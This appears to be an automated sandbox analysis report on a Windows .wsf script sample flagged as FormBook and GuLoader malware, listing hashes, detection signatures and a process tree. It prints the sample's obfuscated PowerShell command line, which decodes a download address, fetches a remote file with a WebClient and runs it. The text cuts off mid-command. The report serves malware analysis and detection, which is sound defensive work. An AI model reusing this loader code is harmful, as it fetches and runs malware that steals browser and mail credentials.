Edit tour
Windows
Analysis Report
CDS AC 661171855-VN1 SOA.wsf
Overview
General Information
| Sample name: | CDS AC 661171855-VN1 SOA.wsf |
| Analysis ID: | 1432342 |
| MD5: | 7700a37bbfb2243c94b721449cc69b7f |
| SHA1: | bc4e02172bfd1b919672b7480a8ddc5ad439ce9a |
| SHA256: | 655de8d3db5fbb1b2c4a57bb403f01070bf044c9afe2c4d6f7f25c2c765d87f7 |
| Tags: | wsf |
| Infos: |   |
 | |
Detection
FormBook, GuLoader
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Queues an APC in another process (thread injection)
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 2304 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\CDS A C 66117185 5-VN1 SOA. wsf" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
powershell.exe (PID: 7108 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$Caked124 = 1;$Alle groernes15 ='S';$Alle groernes15 +='ubstrin ';$Allegro ernes15+=' g';Functio n unkaiser like($Micr ometeoroid ){$Special uddannelse r=$Microme teoroid.Le ngth-$Cake d124;For($ Presaged=1 ; $Presage d -lt $Spe cialuddann elser; $Pr esaged+=(2 )){$Vedic+ =$Micromet eoroid.$Al legroernes 15.Invoke( $Presaged, $Caked124 );}$Vedic; }function Hydrolyzab le($Superh eater){. ( $Porsitets ) ($Superh eater);}$A lcoholmete r=unkaiser like ',M o LzgiflDl,a ,/ 5 . 0v F(,W,iKnUd o.wKsS FN STB ,1.0,. T0,;S QWFi Sna6c4 ;C Fx 6H4V; S r.v :.1 2 1K.B0A), B Gpe,cRk.oT / 2h0 1,0 0N1 0A1D U F i r,eUfV o.x./H1 2, 1S.A0, ';$ Nonattribu tion175=un kaiserlike '.U sMe r -pA gDe.n Dtb ';$Leg giest89=un kaiserlike 'Hh t t p :T/,/.8S7 C.C1S2,1,. 1k0S5T.,1 6P3 / d,o m ksaPpki Bt,l e rb. fmIs iA '; $Heitiki=u nkaiserlik e 'T>S ';$ Porsitets= unkaiserli ke ' iUeLx ';$Mediae valism='Ga rapato';Hy drolyzable (unkaiser like 'RSCe ,tS- CYoCn Et.e,n.t, C- P aAt.h S TP:J\ JU o.rbdMk l o,dAe,r . t.xNtC A-, V,aLl.u.eE .$,M e.dA iTa eBvSaJ l.iHsNmU; ');Hydroly zable (unk aiserlike ' i f ( t e sFt -Ap ,a.t h, RT G:E\ J oNr d,k lBoFd FeDrO.,tPx .tL)F{ eGx Si t }.; ' );$landing sprocedure rnes = unk aiserlike ',e.cDh.o. N%,a p.p, d aotFa.% \ T hLeWrS mMoRsGwdiS t c.hM1B7 2I. MIe d, T&P&E Be. cUhFoF ,$. ';Hydroly zable (unk aiserlike '.$.gQlCoP bpaClB:,AL l gRu mm=A ( cHm dH / c $Ml,aa nRdPiAn g s.p.r.oTc, eOdMuAr,eK r n,ets ) ');Hydroly zable (unk aiserlike ' $ g lSo b a lU:LD. a t,aTmAaG sSk i n e rInNe,=N$ LSeAg,g i e,sDtf8O9E . s,pDlSi t (.$,H e iCtAi kSi, ). ');$Leg giest89=$D atamaskine rne[0];Hyd rolyzable (unkaiserl ike ' $Gg l o b a,lK :.RJi p pH lAeSrMs.=C N e,w,-,OR b.j e cftB SDyAsmtPe mS.SN e t K.BWNe,bGC lSi eKnBt F ');Hydro lyzable (u nkaiserlik e 'U$IR iJ p p l e rC sL.RH.e,aR d,e r sF[. $BNsoVnMab t t,rIi bA uDt iDo nF 1S7d5 ]P=S $EAVl,c.o. hRo lHmSe, tHe r ');$ Entertaine res=unkais erlike 'SR iHpApWl e ,rvs . DSo RwWn,l.oSa ,dIFsiVl e S(a$ L e g ,gCiBeSs t C8 9P,E$NL u,fKtOn i Rn,gDeDr,s 1 8 5,)S ';$Enterta ineres=$Al gum[1]+$En tertainere s;$Luftnin gers185=$A lgum[0];Hy drolyzable (unkaiser like ',$ g ,l.o,b,aGl :,P rLo,p a gAe r,e .nRd e =G( .TUeCs tN- ,P a,t h $ LPuCfktD nSi,nGg eF r sF1T8I5L ) ');while (!$Propag erende) {H ydrolyzabl e (unkaise rlike ' $S gcl oDbSaF lS:.V iud. e lCyHsRtB e nQ=C$Ft, r uPei ') ;Hydrolyza ble $Enter taineres;H ydrolyzabl e (unkaise rlike ' S. t a r tU-, Stl.eLe.pH S4 ');Hyd rolyzable (unkaiserl ike ',$ g lEo b.a lE :OP,rNoPp, aSgTe r.e n dEe,= (P T,e sRtF-. POa tPhV B $FL u,fTtb n i n,g eG rUsB1O8.5